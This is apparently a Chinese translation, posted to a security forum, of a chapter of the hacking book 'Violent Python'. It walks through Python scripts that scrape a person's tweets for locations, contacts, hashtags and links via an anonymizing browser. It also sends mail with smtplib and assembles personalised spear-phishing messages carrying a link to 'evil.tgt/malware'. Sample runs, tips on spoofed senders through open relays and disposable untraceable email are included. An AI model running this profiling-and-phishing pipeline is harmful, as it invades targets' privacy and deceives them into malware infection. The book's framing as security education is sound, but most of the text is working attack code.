《Violent Python》第六章Web Recon with Python (2)中文版(乌云python，英文爱好者翻译）

crown丶prince (我用双手成就你的梦想) | 2015-11-01 12:40

连载介绍信息:http://zone.wooyun.org/content/23138

原作者：Chris Katsaropoulos

第一译者：@草帽小子-DJ

第二译者：crown丶prince

获取Twitter的位置数据

很多Twitter用户遵守一个不成文的规定，当有创作时就与全世界分享。一般来说，计算公式是：【其他Twitter用户的消息是针对】+【文本的消息加上段连接】+【Hash标签】。其他的信息可能也包括，但是不在消息体内，就像图像或者位置。然而，退后一步，以攻击者的眼光审视一下这个公式，对于恶意用户这个公式变成了：【用户感兴趣的人，增加某人真正交流的机会】+【某人感兴趣的链接或者主题，他们会对这个主题的消息很感兴趣】+【某人可能会对这个主题有更多的了解】。图片或者地理标签不在有用或者是朋友的有趣的花边新闻。他们会成为配置中的额外的细节，例如某人经常去哪吃早餐。虽然这可能是一个偏执的观点，我们将自动化的收集从Twitter检索的每一条信息。

# coding=UTF-8


import json


import urllib


import optparse


from anonBrowser import *
def get_tweets(handle):


    query = urllib.quote_plus('from:' + handle+ ' since:2009-01-01 include:retweets')


    tweets = []


    browser = anonBrowser()


    browser.anonymize()


    response = browser.open('http://search.twitter.com/search.json?q='+ query)


    json_objects = json.load(response)


    for result in json_objects['results']:


        new_result = {}


        new_result['from_user'] = result['from_user_name']


        new_result['geo'] = result['geo']


        new_result['tweet'] = result['text']


        tweets.append(new_result)


    return tweets
def load_cities(cityFile):


    cities = []


    for line in open(cityFile).readlines():


        city=line.strip('\n').strip('\r').lower()


        cities.append(city)


    return cities
def twitter_locate(tweets,cities):


    locations = []


    locCnt = 0


    cityCnt = 0


    tweetsText = ""


    for tweet in tweets:


        if tweet['geo'] != None:


            locations.append(tweet['geo'])


            locCnt += 1


            tweetsText += tweet['tweet'].lower()


    for city in cities:


        if city in tweetsText:


            locations.append(city)


            cityCnt+=1


            print("[+] Found "+str(locCnt)+" locations via Twitter API and "+str(cityCnt)+" locations from text search.")


    return locations
def main():


    parser = optparse.OptionParser('usage%prog -u <twitter handle> [-c <list of cities>]')


    parser.add_option('-u', dest='handle', type='string', help='specify twitter handle')


    parser.add_option('-c', dest='cityFile', type='string', help='specify file containing cities to search')


    (options, args) = parser.parse_args()


    handle = options.handle


    cityFile = options.cityFile


    if (handle==None):


        print parser.usage


        exit(0)


    cities = []


    if (cityFile!=None):


        cities = load_cities(cityFile)


        tweets = get_tweets(handle)


        locations = twitter_locate(tweets,cities)


        print("[+] Locations: "+str(locations))

if __name__ == '__main__': main()

我了测试我们的脚本，我们建立了城市的列表。

recon:∼# cat mlb-cities.txt | more baltimore boston chicago cleveland detroit <..SNIPPED..> recon:∼# python twitterGeo.py -u redsox -c mlb-cities.txt [+] Found 0 locations via Twitter API and 1 locations from text search. [+] Locations: ['toronto'] recon:∼# python twitterGeo.py -u nationals -c mlb- cities.txt [+] Found 0 locations via Twitter API and 1 locations from text search. [+] Locations: ['denver']

用正则表达式解析Twitter的关注

接下来我们将收集目标的兴趣，这包括其他用户或者是网路内容。任何时候网站都提供了能力知道用户对什么感兴趣，跳过去，这些数据将成为成功的社会工程攻击的基础。如我们前面讨论的，Twitter的兴趣点包含任何链接，Hash标签或者是其他用户提到的内容。用正则表达式找到这些很容易。

# coding=UTF-8 import json import re import urllib import urllib2 import optparse from anonBrowser import *


def get_tweets(handle):


    query = urllib.quote_plus('from:' + handle+ ' since:2009-01-01 include:retweets')


    tweets = []


    browser = anonBrowser()


    browser.anonymize()


    response = browser.open('http://search.twitter.com/search.json?q=' + query)


    json_objects = json.load(response)


    for result in json_objects['results']:


        new_result = {}


        new_result['from_user'] = result['from_user_name']


        new_result['geo'] = result['geo']


        new_result['tweet'] = result['text']


        tweets.append(new_result)


    return tweets
def find_interests(tweets):


    interests = {}


    interests['links'] = []


    interests['users'] = []


    interests['hashtags'] = []


    for tweet in tweets:


        text = tweet['tweet']


        links = re.compile('(http.*?)\Z|(http.*?) ').findall(text)


        for link in links:


            if link[0]:


                link = link[0]


            elif link[1]:


                link = link[1]


            else:


                continue


            try:


                response = urllib2.urlopen(link)


                full_link = response.url


                interests['links'].append(full_link)


            except:


                pass


        interests['users'] += re.compile('(@\w+)').findall(text)


        interests['hashtags'] +=re.compile('(#\w+)').findall(text)


    interests['users'].sort()


    interests['hashtags'].sort()


    interests['links'].sort()


    return interests

def main(): parser = optparse.OptionParser('usage%prog -u <twitter handle>') parser.add_option('-u', dest='handle', type='sring', help='specify twitter handle') (options, args) = parser.parse_args() handle = options.handle if handle == None: print(parser.usage) exit(0) tweets = get_tweets(handle) interests = find_interests(tweets) print('\n[+] Links.') for link in set(interests['links']): print(' [+] ' + str(link)) print('\n[+] Users.') for user in set(interests['users']): print(' [+] ' + str(user)) print('\n[+] HashTags.') for hashtag in set(interests['hashtags']): print('\n[+] ' + str(hashtag)) if __name__ == '__main__': main()

运行我们的兴趣分析脚本，我们看到它解析出针对目标的链接，用户名，Hash标签。请注意，它返回了一个Youtube的视频，一些用户名和当前即将到来的比赛的Hash标签。好奇心再一次让我们知道该怎么做。

recon:∼# python twitterInterests.py -u sonnench [+] Links. [+]http://www.youtube.com/watch?v=K-BIuZtlC7k&feature=plcp [+] Users. [+] @tomasseeger [+] @sonnench [+] @Benaskren [+] @AirFrayer [+] @NEXERSYS [+] HashTags. [+] #UFC148

这里使用正则表达式不是寻找信息的合适方法。正则表达式抓住包含链接的文本将会错过某一特定的URL，因为用正则表达式很难匹配所有格式的URL。然而，对我们而言正则表达式99%的情况下会工作。此外，使用urllib2库里的函数打开链接而不是我们的匿名类。

再一次，我们将使用使用一个字典排序信息到一个更加易于管理的数据结构中，所以我们不需要创造一个类。由于Twitter字符的限制，许多URL使用某种服务把URL变短了。这些链接并不非常有用，因为他们能指向任何地方。为了扩展他们，我们将使用urllib2打开。脚本打开页面后，urllib能取回整个URL。其他用户和Hash标签将使用类似的正则表达式来检索。并返回给主要的方法twitter()。位置和关注最后会被调用得到。

可以做其他事情扩展处理Twitter的能力。互联网上有无限的资源，无数中分析数据的方法要求扩大自动化收集信息程序的能力。

将我们整个系列的侦查包装在一起，我们做了一个类来检索位置，兴趣和Twitter。这些在下一节中将会看到用处的。

# coding=UTF-8 import urllib from anonBrowser import * import json import re import urllib2

class reconPerson: def __init__(self, handle): self.handle = handle self.tweets = self.get_tweets() def get_tweets(self): query = urllib.quote_plus('from:' + self.handle+' since:2009-01-01 include:retweets') tweets = [] browser = anonBrowser() browser.anonymize() response = browser.open('http://search.twitter.com/search.json?q=' + query) json_objects = json.load(response) for result in json_objects['results']: new_result = {} new_result['from_user'] = result['from_user_name'] new_result['geo'] = result['geo'] new_result['tweet'] = result['text'] tweets.append(new_result) return tweets def find_interests(self): interests = {} interests['links'] = [] interests['users'] = [] interests['hashtags'] = [] for tweet in self.tweets: text = tweet['tweet'] links = re.compile('(http.*?)\Z|(http.*?) ').findall(text) for link in links: if link[0]: link = link[0] elif link[1]: link = link[1] else:continue try: response = urllib2.urlopen(link) full_link = response.url interests['links'].append(full_link) except: pass interests['users'] +=re.compile('(@\w+)').findall(text) interests['hashtags'] +=re.compile('(#\w+)').findall(text) interests['users'].sort() interests['hashtags'].sort() interests['links'].sort() return interests def twitter_locate(self, cityFile): cities = [] if cityFile != None: for line in open(cityFile).readlines(): city = line.strip('\n').strip('\r').lower() cities.append(city) locations = [] locCnt = 0 cityCnt = 0 tweetsText = '' for tweet in self.tweets: if tweet['geo'] != None: locations.append(tweet['geo']) locCnt += 1 tweetsText += tweet['tweet'].lower() for city in cities: if city in tweetsText: locations.append(city) cityCnt += 1 return locations

匿名邮件

越来约频繁的，网站要求用户创建并登陆账户，如果他们想访问网站的最佳资源的话。这显然会出现一个问题，对于传统的浏览用户，浏览互联网的浏览器是不同的，登陆显然破坏了匿名浏览，登陆后的任何行为取决于账户。大多数网站只需要一个有效的邮件地址并不检查其他的私人信息。像雅虎，Google提供的邮箱服务是免费的，很容易申请。然而，他们有一些服务和条款你必须接受和理解。

一个很好的选择是使用一个一次性的邮箱账户获得一个永久性的邮箱。十分钟邮箱http://10minutemail.com/10MinuteMail/index.html提供一个一次性的邮箱。攻击者可以利用很难追查的电子邮件创建不依赖他们的账户。大多数网站最起码的使用条款是不允许收集其他用户的信息。虽然实际的攻击者不遵守这些规定，对账户使用这种技术完全可以做到。记住，虽然这一技术可以被用来保护你，你应该采取行动，确保你的账户的行为安全。

大规模的社会工程

在这一点上，我们已经收集了目标的大量的有价值的信息。利用这些信息自动的生成邮件是一个复杂的事，尤其是添加了足够的细节让他变得可行。在这一点上一个选项可能会让目前的程序停止：这也允许攻击者利用所有的有用的信息构造一个邮件。然而，手动发邮件给一个大组织的每一个人是不可行的。Python的能力允许我们的这个过程自动化并快速获得结果。为了这个目的，我们将使用收集到的信息建立一个非常简单的邮件并发送给目标。

使用Smtplib发送邮件给目标

发送电子邮件的过程中通常需要开发客户的选择，点击新建，然后点击发送。在这背后，客户端连接到服务器，可能记录了日志，交换信息的发送人，收件人和其他必要的资料。Python的Smtplib库将在程序中处理这些过程。我们将通过建立一个Python的电子邮件客户端发送我们的恶意邮件给目标。这个客户端很基本，但让我们在程序中发送邮件很简单。我们这次的目的，我们将使用Google的邮件SMTP服务，你需要创建一个Google邮件账户，在我们的脚本中使用，或者使用自己的SMTP服务器。

import smtplib from email.mime.text import MIMEText

def sendMail(user,pwd,to,subject,text): msg = MIMEText(text) msg['From'] = user msg['To'] = to msg['Subject'] = subject try: smtpServer = smtplib.SMTP('smtp.gmail.com', 587) print("[+] Connecting To Mail Server.") smtpServer.ehlo() print("[+] Starting Encrypted Session.") smtpServer.starttls() smtpServer.ehlo() print("[+] Logging Into Mail Server.") smtpServer.login(user, pwd) print("[+] Sending Mail.") smtpServer.sendmail(user, to, msg.as_string()) smtpServer.close() print("[+] Mail Sent Successfully.") except: print("[-] Sending Mail Failed.") user = 'username' pwd = 'password' sendMail(user, pwd, 'target@tgt.tgt', 'Re: Important', 'Test Message')

运行脚本，检查我们的邮箱，我们可以看到成功的发送了邮件。

recon:# python sendMail.py [+] Connecting To Mail Server. [+] Starting Encrypted Session. [+] Logging Into Mail Server. [+] Sending Mail. [+] Mail Sent Successfully.

提供了有效的邮件服务器和参数，客户端将正确的发送邮件给目标。有许多的邮件服务器，然而，不带开转发，我们只能发送邮件到就特定的地址。在本地的邮件服务中设置转发，或者在互联网上打开转发。将能发送邮件从任何地址到任何地址，发送方的地址甚至可以是无效的。

垃圾邮件的发送者使用相同的技术发送邮件来自Potus@whitehouse.gov：[email protected] 可疑地址邮件，我们可以伪造邮件的发送地址是关键。使用客户端打开，打开转发功能，是攻击者从一个看起来值得信奈的地址发送邮件，增加用户点开邮件的可能性。

用Smtplib进行鱼叉式网络钓鱼

将我们所有的研究放在一起是我们最后的阶段。在这里，我们的脚本创建了一个看起来像目标朋友发来的电子邮件，目标发现一些有趣的事情，邮件看起来是真人写的。大量的研究投入到帮助电脑的的交流看起来更像人，各种各样的方法任然在完善。为了减少这种可能性，我们将创建一个包含攻击荷载的的简单的信息邮件。程序的几个部分之一将涉及选择包含这条信息。我们的程序将按数据随机的选择。采取地步骤是：选择虚假的发件人地址，制作一个主题，创建一个信息，然后发送电子邮件。幸运的是创建发送人和主题是相当的简单。

代码的if语句仔细的处理和如何将短信息连接在一起是很重要的问题。当处理数量巨大的可能性时，在我们的侦查中将使用更多情况的代码，每一个可能性会被分为独立的函数。每一个方法将以特定的的方法承担一块的开始和结束，然后独立与其他代码的操作。这样，收集到某人的信息就越多，唯一改变的是方法。最后一步是通过我们的电子邮件客户端，相信它的人愚蠢的做剩下的活。这个过程的没一部分在这一章中都讨论过，这是任何被用来获取权限的钓鱼网站的产物。在我们的例子中，我们简单的发送一个名不副实的链接，有效荷载可以是附件或者是诈骗网站，或者任何其他的攻击方法。这个过程将对每一个成员重复，只要一个人上当攻击者就能获取权限。

我们特定的脚本将攻击一个用户基于他公开的信息。基于他的地点，用户，Hash标签，链接，脚本将创建一个附带恶意链接的邮件等待用户点击。

# coding=UTF-8 import smtplib import optparse from email.mime.text import MIMEText from twitterClass import * from random import choice


def sendMail(user,pwd,to,subject,text):


    msg = MIMEText(text)


    msg['From'] = user


    msg['To'] = to


    msg['Subject'] = subject


    try:


        smtpServer = smtplib.SMTP('smtp.gmail.com', 587)


        print("[+] Connecting To Mail Server.")


        smtpServer.ehlo()


        print("[+] Starting Encrypted Session.")


        smtpServer.starttls()


        smtpServer.ehlo()


        print("[+] Logging Into Mail Server.")


        smtpServer.login(user, pwd)


        print("[+] Sending Mail.")


        smtpServer.sendmail(user, to, msg.as_string())


        smtpServer.close()


        print("[+] Mail Sent Successfully.")


    except:


        print("[-] Sending Mail Failed.")
def main():


    parser = optparse.OptionParser('usage%prog -u <twitter target> -t <target email> -l <gmail login> -p <gmail password>')


    parser.add_option('-u', dest='handle', type='string', help='specify twitter handle')


    parser.add_option('-t', dest='tgt', type='string', help='specify target email')


    parser.add_option('-l', dest='user', type='string', help='specify gmail login')


    parser.add_option('-p', dest='pwd', type='string', help='specify gmail password')


    (options, args) = parser.parse_args()


    handle = options.handle


    tgt = options.tgt


    user = options.user


    pwd = options.pwd


    if handle == None or tgt == None or user ==None or pwd==None:


        print(parser.usage)


        exit(0)


    print("[+] Fetching tweets from: "+str(handle))


    spamTgt = reconPerson(handle)


    spamTgt.get_tweets()


    print("[+] Fetching interests from: "+str(handle))


    interests = spamTgt.find_interests()


    print("[+] Fetching location information from: "+ str(handle))


    location = spamTgt.twitter_locate('mlb-cities.txt')


    spamMsg = "Dear "+tgt+","


    if (location!=None):


        randLoc=choice(location)


        spamMsg += " Its me from "+randLoc+"."


    if (interests['users']!=None):


        randUser=choice(interests['users'])


        spamMsg += " "+randUser+" said to say hello."


    if (interests['hashtags']!=None):


        randHash=choice(interests['hashtags'])


        spamMsg += " Did you see all the fuss about "+ randHash+"?"


    if (interests['links']!=None):


        randLink=choice(interests['links'])


        spamMsg += " I really liked your link to: "+randLink+"."


    spamMsg += " Check out my link to http://evil.tgt/malware"


    print("[+] Sending Msg: "+spamMsg)


    sendMail(user, pwd, tgt, 'Re: Important', spamMsg)

if __name__ == '__main__': main()

测试我们的脚本，我们可以获得一些关于Boston Red Sox的信息，从他的Twitter账户上，为了发送一个恶意的垃圾邮件。

recon# python sendSpam.py -u redsox -t target@tgt -l username -p password [+] Fetching tweets from: redsox [+] Fetching interests from: redsox [+] Fetching location information from: redsox [+] Sending Msg: Dear redsox, Its me from toronto. @davidortiz said to say hello. Did you see all the fuss about #SoxAllStars? I really liked your link to:http://mlb.mlb.com. Check out my link to http:// evil.tgt/malware [+] Connecting To Mail Server. [+] Starting Encrypted Session. [+] Logging Into Mail Server. [+] Sending Mail. [+] Mail Sent Successfully.

本章总结

虽然这个方法不是用于另一个人或者组织，但它对认识其可行性和组织的脆弱性很重要。Python和其他脚本语言允许程序员快速的创建一个方法，使用从互联网上找到的广阔的资源，来获取潜在的利益。在我们的代码中，我创建了一个类来模拟浏览器同时增加了匿名访问，检索网站，使用强大的Google，利用Twitter来了解目标的更多信息功能，然后把所有的细节发送一个特殊的电子邮件给目标用户。互联网的连接速度限制了程序，线程的某些函数将大大的减少执行时间。此外，一旦我们学会了如何从数据源中检索信息，对其他网站做同样的信息是很简单的。个人美誉访问和处理互联网上大量的信息的能力，但是强大的Python和它的库允许访问每一个资源的能力远远高于几个熟练的人员。知道这一切，攻击不是你想象中的那么复杂，你的组织是如何的脆弱？什么公开的信息可以被攻击者使用？你会成为一个Python检索信息和恶意邮件的受害者吗？

译者的话：

下周同一时间，敬请期待《Violent Python》最终章节！同时，我们会在最后把这本书翻译的原稿分享给大家，欢迎关注！